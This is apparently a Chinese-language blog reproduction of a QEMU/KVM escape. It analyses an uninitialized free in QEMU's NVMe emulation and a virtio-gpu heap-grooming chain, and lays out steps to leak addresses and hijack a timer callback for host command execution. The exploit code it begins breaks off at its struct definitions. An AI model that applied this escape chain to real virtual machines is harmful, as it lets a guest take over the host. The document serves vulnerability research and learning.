Misuse Error Handling Leading To QEMU/KVM Escape

这里复现《Scavenger:Misuse Error Handling Leading To QEMU/KVM Escape》,虽然没有CVE,但也是确确实实存在过可以利用的漏洞。

具体参考:https://zhuanlan.zhihu.com/p/373084566https://github.com/hustdebug/scavenger

漏洞分析

漏洞函数

nvme_map_prp函数中运行到pci_dma_sglist_init 有qsg->sg = g_malloc(alloc_hint * sizeof(ScatterGatherEntry)),为qsg->sg分配一个堆地址;接着运行到if (unlikely(!prp2))时,prp2为0,通过判断直接跳转到unmap去执行qemu_sglist_destroy函数, qemu_sglist_destroy函数中有g_free(qsg->sg)释放堆内存。但是运行到的是qemu_iovec_init函数,qsg->sg中就是一个未初始化的值,接着跳转到unmap去执行qemu_sglist_destroy函数也会释放这个未初始化的值,如果这个未初始化的值是一块可供虚拟机直接读写的内存地址就可以对漏洞进一步利用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
uint64_t prp2, uint32_t len, NvmeCtrl *n)
{
hwaddr trans_len = n->page_size - (prp1 % n->page_size);
trans_len = MIN(len, trans_len);
int num_prps = (len >> n->page_bits) + 1;

if (unlikely(!prp1)) {
trace_nvme_err_invalid_prp();
return NVME_INVALID_FIELD | NVME_DNR;
} else if (n->cmbsz && prp1 >= n->ctrl_mem.addr &&
prp1 < n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size)) {
qsg->nsg = 0;
qemu_iovec_init(iov, num_prps);
qemu_iovec_add(iov, (void *)&n->cmbuf[prp1 - n->ctrl_mem.addr], trans_len);
} else {
pci_dma_sglist_init(qsg, &n->parent_obj, num_prps);
qemu_sglist_add(qsg, prp1, trans_len);
}
len -= trans_len;
if (len) {
if (unlikely(!prp2)) {
trace_nvme_err_invalid_prp2_missing();
goto unmap;
}
………………
………………

}
return NVME_SUCCESS;

unmap:
qemu_sglist_destroy(qsg);
return NVME_INVALID_FIELD | NVME_DNR;
}

void qemu_sglist_destroy(QEMUSGList *qsg)
{
object_unref(OBJECT(qsg->dev));
g_free(qsg->sg);
memset(qsg, 0, sizeof(*qsg));
}

接下来就完全参考Gaoning大佬的思路做出的分析,建议直接看开头推荐的链接,自己这里写这篇文章纯粹是怕自己遗忘。

确定上层函数

nvme_map_prp的上层调用有三个函数:nvme_dma_write_prp、nvme_dma_read_prp和nvme_rw。

nvme_dma_write_prp和nvme_dma_read_prp中的qsg都是栈上的变量,存在于栈上的数据导致无法去控制qsg->sg中的未初始化变量

1
2
3
4
5
6
7
8
9
10
11
12
static uint16_t nvme_dma_write_prp(NvmeCtrl *n, uint8_t *ptr, uint32_t len,
uint64_t prp1, uint64_t prp2)
{
………………
………………
if (nvme_map_prp(&qsg, &iov, prp1, prp2, len, n)) {
return NVME_INVALID_FIELD | NVME_DNR;
}
………………
………………
return status;
}

最后的nvme_rw中的qsg就是存在于堆上的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
static void nvme_process_sq(void *opaque)
{
………………
………………
while (!(nvme_sq_empty(sq) || QTAILQ_EMPTY(&sq->req_list))) {
addr = sq->dma_addr + sq->head * n->sqe_size;
nvme_addr_read(n, addr, (void *)&cmd, sizeof(cmd));
nvme_inc_sq_head(sq);

req = QTAILQ_FIRST(&sq->req_list);
QTAILQ_REMOVE(&sq->req_list, req, entry);
QTAILQ_INSERT_TAIL(&sq->out_req_list, req, entry);
memset(&req->cqe, 0, sizeof(req->cqe));
req->cqe.cid = cmd.cid;

status = sq->sqid ? nvme_io_cmd(n, &cmd, req) :
nvme_admin_cmd(n, &cmd, req);
………………
………………
}

static uint16_t nvme_io_cmd(NvmeCtrl *n, NvmeCmd *cmd, NvmeRequest *req)
{
………………
………………
case NVME_CMD_READ:
return nvme_rw(n, ns, cmd, req);
default:
trace_nvme_err_invalid_opc(cmd->opcode);
return NVME_INVALID_OPCODE | NVME_DNR;
}
}

static uint16_t nvme_rw(NvmeCtrl *n, NvmeNamespace *ns, NvmeCmd *cmd,
NvmeRequest *req)
{
………………
………………
if (nvme_map_prp(&req->qsg, &req->iov, prp1, prp2, data_size, n)) {
block_acct_invalid(blk_get_stats(n->conf.blk), acct);
return NVME_INVALID_FIELD | NVME_DNR;
}
………………
………………
}

跨域攻击

virtio_gpu_create_mapping_iov函数中dma_memory_map将虚拟机物理内存映射qemu中的分配给虚拟机真实内存,(*iov)[i].iov_base中的地址就是分配给虚拟机的地址,虚拟机可以直接对其读写

在*iov释放后,接着被qsg申请,利用残留的地址,使用上面的漏洞去释放该内存,在虚拟机中可以直接对该内存读写,就可以很方便地去伪造chunk、泄漏信息,仅仅通过在虚拟机中的读写内存,进而跨域影响到qemu。

相关函数的调用

知道需要使用virtio_gpu_create_mapping_iov函数去设置Mapping Table后,接下来就要搞清楚怎样去调用它。

当时我尝试自己去找上层调用链,和之前一样最后找到virtio_gpu_ctrl_bh这个底半部(bottom half)函数,通过virtio_gpu_handle_ctrl_cb就可以触发

1
2
3
4
5
static void virtio_gpu_handle_ctrl_cb(VirtIODevice *vdev, VirtQueue *vq)
{
VirtIOGPU *g = VIRTIO_GPU(vdev);
qemu_bh_schedule(g->ctrl_bh);
}

但是在virtio-gpu.c这个文件中根本就找不到virtio_gpu_handle_ctrl_cb的上层函数,也找不到设备注册的相关函数,当时直接自闭,最后是参考Gaoning大佬的exp中设置的参数才搞明白(事后诸葛🤡)。

virtio_gpu_device_realize中会调用virtio_gpu_base_device_realize函数,一开始我还以为这个函数跟virtio_gpu_handle_ctrl_cb的调用没多大关系,但是进入virtio_gpu_base_device_realize函数后进一步调用virtio_add_queue函数,在virtio_add_queue函数中会将virtio_gpu_handle_ctrl_cb函数的地址赋值给vdev->vq[i].handle_output,也就是后续virtio_gpu_handle_ctrl_cb的调用可以通过vdev->vq[i].handle_output去触发。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
static void virtio_gpu_device_realize(DeviceState *qdev, Error **errp)
{
………………
………………

if (!virtio_gpu_base_device_realize(qdev,
virtio_gpu_handle_ctrl_cb,
virtio_gpu_handle_cursor_cb,
errp)) {
return;
}

g->ctrl_vq = virtio_get_queue(vdev, 0);
g->cursor_vq = virtio_get_queue(vdev, 1);
g->ctrl_bh = qemu_bh_new(virtio_gpu_ctrl_bh, g);
g->cursor_bh = qemu_bh_new(virtio_gpu_cursor_bh, g);
QTAILQ_INIT(&g->reslist);
QTAILQ_INIT(&g->cmdq);
QTAILQ_INIT(&g->fenceq);
}

bool
virtio_gpu_base_device_realize(DeviceState *qdev,
VirtIOHandleOutput ctrl_cb,
VirtIOHandleOutput cursor_cb,
Error **errp)
{
………………
………………
if (virtio_gpu_virgl_enabled(g->conf)) {
/* use larger control queue in 3d mode */
virtio_add_queue(vdev, 256, ctrl_cb);
virtio_add_queue(vdev, 16, cursor_cb);
} else {
virtio_add_queue(vdev, 64, ctrl_cb);
virtio_add_queue(vdev, 16, cursor_cb);
}
………………
………………

}

VirtQueue *virtio_add_queue(VirtIODevice *vdev, int queue_size,
VirtIOHandleOutput handle_output)
{
int i;

for (i = 0; i < VIRTIO_QUEUE_MAX; i++) {
if (vdev->vq[i].vring.num == 0)
break;
}

if (i == VIRTIO_QUEUE_MAX || queue_size > VIRTQUEUE_MAX_SIZE)
abort();

vdev->vq[i].vring.num = queue_size;
vdev->vq[i].vring.num_default = queue_size;
vdev->vq[i].vring.align = VIRTIO_PCI_VRING_ALIGN;
vdev->vq[i].handle_output = handle_output;
vdev->vq[i].handle_aio_output = NULL;
vdev->vq[i].used_elems = g_malloc0(sizeof(VirtQueueElement) *
queue_size);

return &vdev->vq[i];
}

在hw/virtio/virtio-pci.c中的virtio_pci_notify_write函数调用virtio_queue_notify,接着调用vq->handle_output(vdev, vq)就可以进入virtio_gpu_handle_ctrl_cb函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
static void virtio_pci_notify_write(void *opaque, hwaddr addr,
uint64_t val, unsigned size)
{
VirtIODevice *vdev = opaque;
VirtIOPCIProxy *proxy = VIRTIO_PCI(DEVICE(vdev)->parent_bus->parent);
unsigned queue = addr / virtio_pci_queue_mem_mult(proxy);

if (queue < VIRTIO_QUEUE_MAX) {
virtio_queue_notify(vdev, queue);
}
}

void virtio_queue_notify(VirtIODevice *vdev, int n)
{
VirtQueue *vq = &vdev->vq[n];

if (unlikely(!vq->vring.desc || vdev->broken)) {
return;
}

trace_virtio_queue_notify(vdev, vq - vdev->vq, vq);
if (vq->host_notifier_enabled) {
event_notifier_set(&vq->host_notifier);
} else if (vq->handle_output) {
vq->handle_output(vdev, vq);

if (unlikely(vdev->start_on_kick)) {
virtio_set_started(vdev, true);
}
}
}

在virtio-pci.c中可以很容易去找到设备的注册和读写函数。

之后进入virtio_gpu_handle_ctrl函数就会调用virtqueue_pop来得到cmd,在virtqueue_pop中进一步调用virtqueue_split_pop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
static void virtio_gpu_handle_ctrl(VirtIODevice *vdev, VirtQueue *vq)
{
………………
………………
cmd = virtqueue_pop(vq, sizeof(struct virtio_gpu_ctrl_command));
while (cmd) {
cmd->vq = vq;
cmd->error = 0;
cmd->finished = false;
QTAILQ_INSERT_TAIL(&g->cmdq, cmd, next);
cmd = virtqueue_pop(vq, sizeof(struct virtio_gpu_ctrl_command));
}

virtio_gpu_process_cmdq(g);
………………
………………
}

void *virtqueue_pop(VirtQueue *vq, size_t sz)
{
if (unlikely(vq->vdev->broken)) {
return NULL;
}

if (virtio_vdev_has_feature(vq->vdev, VIRTIO_F_RING_PACKED)) {
return virtqueue_packed_pop(vq, sz);
} else {
return virtqueue_split_pop(vq, sz);
}
}

virtqueue_split_pop函数就是设置Mapping Table中数据的关键函数,主要将vq->vring->desc虚拟机物理地址中的VirtIODevice结构体经过一些判断处理后赋值给elem,具体看源码和注释:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
static void *virtqueue_split_pop(VirtQueue *vq, size_t sz)
{
unsigned int i, head, max;
VRingMemoryRegionCaches *caches;
MemoryRegionCache indirect_desc_cache = MEMORY_REGION_CACHE_INVALID;
MemoryRegionCache *desc_cache;
int64_t len;
VirtIODevice *vdev = vq->vdev;
VirtQueueElement *elem = NULL;
unsigned out_num, in_num, elem_entries;
hwaddr addr[VIRTQUEUE_MAX_SIZE];
struct iovec iov[VIRTQUEUE_MAX_SIZE];
VRingDesc desc;
int rc;

RCU_READ_LOCK_GUARD();
/*
virtio_queue_empty_rcu函数判断队列是否为空, 函数具体判断vq->shadow_avail_idx和vq->last_avail_idx是否相等,
不相等返回0;如果相等,继续使用vring_avail_idx函数更新shadow_avail_idx的值,不相等返回0,相等返回1。
shadow_avail_idx的值是从(vq->vring->avail + offsetof(VRingAvail, idx))虚拟机物理地址中获取。
*/
if (virtio_queue_empty_rcu(vq)) {
goto done;
}
/* Needed after virtio_queue_empty(), see comment in
* virtqueue_num_heads(). */
smp_rmb();

/* When we start there are none of either input nor output. */
out_num = in_num = elem_entries = 0;

max = vq->vring.num;

if (vq->inuse >= vq->vring.num) {
virtio_error(vdev, "Virtqueue size exceeded");
goto done;
}
/*
virtqueue_get_head函数获取队列的头部引索值,head的值从(vq->vring->avail + offsetof(VRingAvail, ring[vq->last_avail_idx]))
虚拟机物理地址中获取
*/
if (!virtqueue_get_head(vq, vq->last_avail_idx++, &head)) {
goto done;
}

if (virtio_vdev_has_feature(vdev, VIRTIO_RING_F_EVENT_IDX)) {
vring_set_avail_event(vq, vq->last_avail_idx);
}
//更新i
i = head;
//获取caches信息
caches = vring_get_region_caches(vq);
if (!caches) {
virtio_error(vdev, "Region caches not initialized");
goto done;
}

if (caches->desc.len < max * sizeof(VRingDesc)) {
virtio_error(vdev, "Cannot map descriptor ring");
goto done;
}

desc_cache = &caches->desc;
/*
vring_split_desc_read函数将(vq->vring->desc + i * sizeof(VRingDesc))虚拟机物理地址中
的VRingDesc结构体赋值给desc
*/
vring_split_desc_read(vdev, &desc, desc_cache, i);
if (desc.flags & VRING_DESC_F_INDIRECT) {
if (!desc.len || (desc.len % sizeof(VRingDesc))) {
virtio_error(vdev, "Invalid size for indirect buffer table");
goto done;
}

/* loop over the indirect descriptor table */
len = address_space_cache_init(&indirect_desc_cache, vdev->dma_as,
desc.addr, desc.len, false);
desc_cache = &indirect_desc_cache;
if (len < desc.len) {
virtio_error(vdev, "Cannot map indirect buffer");
goto done;
}

max = desc.len / sizeof(VRingDesc);
i = 0;
vring_split_desc_read(vdev, &desc, desc_cache, i);
}

/* Collect all the descriptors */
do {
bool map_ok;

if (desc.flags & VRING_DESC_F_WRITE) {
map_ok = virtqueue_map_desc(vdev, &in_num, addr + out_num,
iov + out_num,
VIRTQUEUE_MAX_SIZE - out_num, true,
desc.addr, desc.len);
} else {
if (in_num) {
virtio_error(vdev, "Incorrect order for descriptors");
goto err_undo_map;
}
/*
virtqueue_map_desc函数的效果如下:
iov[out_num].iov_base = dma_memory_map函数映射desc.addr地址后的值
iov[out_num].iov_len = desc.len
out_num ++
*/
map_ok = virtqueue_map_desc(vdev, &out_num, addr, iov,
VIRTQUEUE_MAX_SIZE, false,
desc.addr, desc.len);
}
if (!map_ok) {
goto err_undo_map;
}

/* If we've got too many, that implies a descriptor loop. */
if (++elem_entries > max) {
virtio_error(vdev, "Looped descriptor");
goto err_undo_map;
}
/*
virtqueue_split_read_next_desc函数的作用为:判断desc.flag标志,i = desc->next,
使用vring_split_desc_read获取下一个VRingDesc结构体
*/
rc = virtqueue_split_read_next_desc(vdev, &desc, desc_cache, max, &i);
} while (rc == VIRTQUEUE_READ_DESC_MORE);

if (rc == VIRTQUEUE_READ_DESC_ERROR) {
goto err_undo_map;
}

/* Now copy what we have collected and mapped */
elem = virtqueue_alloc_element(sz, out_num, in_num);
elem->index = head;
elem->ndescs = 1;
for (i = 0; i < out_num; i++) {
elem->out_addr[i] = addr[i];
elem->out_sg[i] = iov[i];
}
for (i = 0; i < in_num; i++) {
elem->in_addr[i] = addr[out_num + i];
elem->in_sg[i] = iov[out_num + i];
}

vq->inuse++;

trace_virtqueue_pop(vq, elem, elem->in_num, elem->out_num);
done:
address_space_cache_destroy(&indirect_desc_cache);

return elem;

err_undo_map:
virtqueue_undo_map_desc(out_num, in_num, iov);
goto done;
}

取得cmd后进入virtio_gpu_simple_process_cmd,首先就是调用VIRTIO_GPU_FILL_CMD,这个宏实际上就是将上面virtqueue_split_pop函数中第一个VirtIODevice结构体的addr中的值拷贝到cmd->cmd_hdr,然后通过switch进入相应的功能

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#define VIRTIO_GPU_FILL_CMD(out) do {                                   \
size_t s; \
s = iov_to_buf(cmd->elem.out_sg, cmd->elem.out_num, 0, \
&out, sizeof(out)); \
if (s != sizeof(out)) { \
qemu_log_mask(LOG_GUEST_ERROR, \
"%s: command size incorrect %zu vs %zu\n", \
__func__, s, sizeof(out)); \
return; \
} \
} while (0)

static void virtio_gpu_simple_process_cmd(VirtIOGPU *g,
struct virtio_gpu_ctrl_command *cmd)
{
VIRTIO_GPU_FILL_CMD(cmd->cmd_hdr);
virtio_gpu_ctrl_hdr_bswap(&cmd->cmd_hdr);

switch (cmd->cmd_hdr.type) {

………………
………………

case VIRTIO_GPU_CMD_RESOURCE_ATTACH_BACKING:
virtio_gpu_resource_attach_backing(g, cmd);
break;
case VIRTIO_GPU_CMD_RESOURCE_DETACH_BACKING:
virtio_gpu_resource_detach_backing(g, cmd);
break;
default:
cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;
break;
}
if (!cmd->finished) {
virtio_gpu_ctrl_response_nodata(g, cmd, cmd->error ? cmd->error :
VIRTIO_GPU_RESP_OK_NODATA);
}
}

virtio_gpu_resource_attach_backing函数中要顺利调用virtio_gpu_create_mapping_iov,还要virtio_gpu_find_resource(g, ab.resource_id)返回的virtio_gpu_simple_resource结构体满足一些条件,所以事先调用virtio_gpu_resource_create_2d函数创建一个virtio_gpu_simple_resource结构体,通过ab.resource_id找到相应的virtio_gpu_simple_resource结构体,之后就能进入virtio_gpu_create_mapping_iov函数了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
static void
virtio_gpu_resource_attach_backing(VirtIOGPU *g,
struct virtio_gpu_ctrl_command *cmd)
{
struct virtio_gpu_simple_resource *res;
struct virtio_gpu_resource_attach_backing ab;
int ret;

VIRTIO_GPU_FILL_CMD(ab);
virtio_gpu_bswap_32(&ab, sizeof(ab));
trace_virtio_gpu_cmd_res_back_attach(ab.resource_id);

res = virtio_gpu_find_resource(g, ab.resource_id);
if (!res) {
qemu_log_mask(LOG_GUEST_ERROR, "%s: illegal resource specified %d\n",
__func__, ab.resource_id);
cmd->error = VIRTIO_GPU_RESP_ERR_INVALID_RESOURCE_ID;
return;
}

if (res->iov) {
cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;
return;
}

ret = virtio_gpu_create_mapping_iov(g, &ab, cmd, &res->addrs, &res->iov);
if (ret != 0) {
cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;
return;
}

res->iov_cnt = ab.nr_entries;
}

static void virtio_gpu_resource_create_2d(VirtIOGPU *g,
struct virtio_gpu_ctrl_command *cmd)
{
………………
………………

if (c2d.resource_id == 0) {
qemu_log_mask(LOG_GUEST_ERROR, "%s: resource id 0 is not allowed\n",
__func__);
cmd->error = VIRTIO_GPU_RESP_ERR_INVALID_RESOURCE_ID;
return;
}

res = virtio_gpu_find_resource(g, c2d.resource_id);
if (res) {
qemu_log_mask(LOG_GUEST_ERROR, "%s: resource already exists %d\n",
__func__, c2d.resource_id);
cmd->error = VIRTIO_GPU_RESP_ERR_INVALID_RESOURCE_ID;
return;
}

res = g_new0(struct virtio_gpu_simple_resource, 1);

res->width = c2d.width;
res->height = c2d.height;
res->format = c2d.format;
res->resource_id = c2d.resource_id;

………………
………………

QTAILQ_INSERT_HEAD(&g->reslist, res, next);
g->hostmem += res->hostmem;
}

进入virtio_gpu_create_mapping_iov函数后就可以完成mapping table的设置

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
int virtio_gpu_create_mapping_iov(VirtIOGPU *g,
struct virtio_gpu_resource_attach_backing *ab,
struct virtio_gpu_ctrl_command *cmd,
uint64_t **addr, struct iovec **iov)
{
struct virtio_gpu_mem_entry *ents;
size_t esize, s;
int i;

if (ab->nr_entries > 16384) {
qemu_log_mask(LOG_GUEST_ERROR,
"%s: nr_entries is too big (%d > 16384)\n",
__func__, ab->nr_entries);
return -1;
}

esize = sizeof(*ents) * ab->nr_entries;
ents = g_malloc(esize);
s = iov_to_buf(cmd->elem.out_sg, cmd->elem.out_num,
sizeof(*ab), ents, esize);
if (s != esize) {
qemu_log_mask(LOG_GUEST_ERROR,
"%s: command data size incorrect %zu vs %zu\n",
__func__, s, esize);
g_free(ents);
return -1;
}

*iov = g_malloc0(sizeof(struct iovec) * ab->nr_entries);
if (addr) {
*addr = g_malloc0(sizeof(uint64_t) * ab->nr_entries);
}
for (i = 0; i < ab->nr_entries; i++) {
uint64_t a = le64_to_cpu(ents[i].addr);
uint32_t l = le32_to_cpu(ents[i].length);
hwaddr len = l;
(*iov)[i].iov_len = l;
(*iov)[i].iov_base = dma_memory_map(VIRTIO_DEVICE(g)->dma_as,
a, &len, DMA_DIRECTION_TO_DEVICE);
if (addr) {
(*addr)[i] = a;
}
if (!(*iov)[i].iov_base || len != l) {
qemu_log_mask(LOG_GUEST_ERROR, "%s: failed to map MMIO memory for"
" resource %d element %d\n",
__func__, ab->resource_id, i);
virtio_gpu_cleanup_mapping_iov(g, *iov, i);
g_free(ents);
*iov = NULL;
if (addr) {
g_free(*addr);
*addr = NULL;
}
return -1;
}
}
g_free(ents);
return 0;
}

具体利用流程

  1. 利用nvme_create_cq或者nvme_create_sq中的malloc原语来实现堆喷,获得稳定堆空间的布局。
  2. 构造mapping table,设置好qsg->sg的值是dma_memory_map后的地址,在后面释放这个地址时在qemu_sglist_destroy函数中有object_unref(OBJECT(qsg->dev)),需要通过这个函数里的判断,所以还需要设置qsg->dev的值是0。
  3. 构造完以后还需要释放,这里直接让dma_memory_map中的len 为0,函数的返回值就是0, 通过 if (!(*iov)[i].iov_base || len != l)这个判断后直接调用virtio_gpu_cleanup_mapping_iov函数释放。
  4. 创建一个sq ,在nvme_init_sq函数中有sq->io_req = g_new(NvmeRequest, sq->size),申请堆内存的大小为0xa0 * sq->size,将之前释放的mapping table重新得到。
  5. 伪造chunk大小为0x290,通过漏洞函数直接释放掉虚拟机的内存,在伪造chunk的fd区域可以泄漏堆地址。
  6. 接下来去泄漏qemu中分配给虚拟机内存,通过virtqueue_split_pop函数中的elem = virtqueue_alloc_element(sz, out_num, in_num)可以得到伪造的chunk,virtqueue_split_pop函数中的dma_memory_map就可以在伪造的chunk中写入相应地址。
  7. 和之前一样继续构造mapping table,伪造chunk大小为0x40,使用漏洞函数释放虚拟机的内存;仍然是创建一个sq ,在nvme_init_sq中有sq->timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, nvme_process_sq, sq)创建时间函数,timer就是使用0x40大小的chunk,从而使用伪造的chunk。
  8. 伪造的chunk中存在一个QEMUTimer结构体,可以泄漏nvme_process_sq函数地址得到qemu的基地址,最后修改cb和opaque就能实现任意命令执行。

这里有个自己刚开始复现时忽视的问题:在nvme_map_prp中进入qemu_iovec_init函数后通过g_new(struct iovec, alloc_hint)申请堆块,申请的大小跟alloc_hint有关;如果申请的chunk也正好是0x40大小,在最后伪造chunk大小为0x40释放以后,由于之前已经被qemu_iovec_init函数申请了一个,0x40的tcache数量就会减1,伪造的chunk就会进入0x40的tcache中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
uint64_t prp2, uint32_t len, NvmeCtrl *n)
{
hwaddr trans_len = n->page_size - (prp1 % n->page_size);
trans_len = MIN(len, trans_len);
int num_prps = (len >> n->page_bits) + 1;

if (unlikely(!prp1)) {
trace_nvme_err_invalid_prp();
return NVME_INVALID_FIELD | NVME_DNR;
} else if (n->cmbsz && prp1 >= n->ctrl_mem.addr &&
prp1 < n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size)) {
qsg->nsg = 0;
qemu_iovec_init(iov, num_prps);
qemu_iovec_add(iov, (void *)&n->cmbuf[prp1 - n->ctrl_mem.addr], trans_len);
}
………………
………………
}

void qemu_iovec_init(QEMUIOVector *qiov, int alloc_hint)
{
qiov->iov = g_new(struct iovec, alloc_hint);
qiov->niov = 0;
qiov->nalloc = alloc_hint;
qiov->size = 0;
}

但是QEMUTimer结构体是由calloc申请的,不会从tcache中取出chunk,只要设置好nvme_map_prp函数中len,接下来调用qemu_iovec_init中的g_new(struct iovec, alloc_hint)可以避免上述情况

说这个有什么用?因为我一开始nvme_map_prp函数的len参数没设置好,就出现上面这种情况,而且当时我并没有发现问题出在哪。

当时我还针对这种情况想了一个方法去完成利用:伪造chunk的大小为0x50,释放以后进入0x50大小的fastbin,利用nvme_init_sq函数中的sq->io_req = g_new(NvmeRequest, sq->size)实现一个大size的堆分配,伪造的chunk进入0x50大小的small bin,先前堆喷已经将0x40大小的small bin清空,calloc申请QEMUTimer结构体将由0x50大小的small bin提供

调用完timer_new_ns后就可以照常利用了

这里不直接让伪造的chunk进入unsorted bin是因为free函数会对chunk的地址进行判断:

1
2
3
4
   if (__builtin_expect (contiguous (av)
&& (char *) nextchunk
>= ((char *) av->top + chunksize(av->top)), 0))
malloc_printerr ("double free or corruption (out)");

后来仔细看了qemu_iovec_init函数才明白问题出在哪。把相应参数设置好以后完全不用怎么麻烦,当然最后也要保证0x40的tcache的数量为7,如果不够就释放一些sq或者cq,保证伪造的chunk释放后进入到fastbin。

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
#include <fcntl.h>
#include <assert.h>
#include <inttypes.h>
#include <sys/mman.h>
#include <sys/io.h>
#include <unistd.h>

void *mmio_nvme;
void *mmio_gpu;
void *buf;
void *nvme_buf;
void *desc_buf;
size_t *payload_buf;
struct VRingDesc *desc;
struct VRingAvail *avail;
struct NvmeCmd *nvme_cmd;
int sq_tail = 0;
int vq_last_avail_idx = 0;
char exec_cmd[0x40] = "gnome-calculator";

typedef struct NvmeCmd {
uint8_t opcode;
uint8_t fuse;
uint16_t cid;
uint32_t nsid;
uint64_t res1;
uint64_t mptr;
uint64_t prp1;
uint64_t prp2;
uint32_t cdw10;
uint32_t cdw11;
uint32_t cdw12;
uint32_t cdw13;
uint32_t cdw14;
uint32_t cdw15;
} NvmeCmd;

typedef struct NvmeCreateCq {
uint8_t opcode;
uint8_t flags;
uint16_t cid;
uint32_t rsvd1[5];
uint64_t prp1;
uint64_t rsvd8;
uint16_t cqid;
uint16_t qsize;
uint16_t cq_flags;
uint16_t irq_vector;
uint32_t rsvd12[4];
} NvmeCreateCq;

typedef struct NvmeCreateSq {
uint8_t opcode;
uint8_t flags;
uint16_t cid;
uint32_t rsvd1[5];
uint64_t prp1;
uint64_t rsvd8;
uint16_t sqid;
uint16_t qsize;
uint16_t sq_flags;
uint16_t cqid;
uint32_t rsvd12[4];
} NvmeCreateSq;

typedef struct NvmeRwCmd {
uint8_t opcode;
uint8_t flags;
uint16_t cid;
uint32_t nsid;
uint64_t rsvd2;
uint64_t mptr;
uint64_t prp1;
uint64_t prp2;
uint64_t slba;
uint16_t nlb;
uint16_t control;
uint32_t dsmgmt;
uint32_t reftag;
uint16_t apptag;
uint16_t appmask;
} NvmeRwCmd;

typedef struct NvmeDeleteQ {
uint8_t opcode;
uint8_t flags;
uint16_t cid;
uint32_t rsvd1[9];
uint16_t qid;
uint16_t rsvd10;
uint32_t rsvd11[5];
} NvmeDeleteQ;

typedef struct VRingAvail
{
uint16_t flags;
uint16_t idx;
uint16_t ring[];
}VRingAvail;

typedef struct VRingDesc
{
uint64_t addr;
uint32_t len;
uint16_t flags;
uint16_t next;
} VRingDesc;

struct virtio_gpu_ctrl_hdr {
uint32_t type;
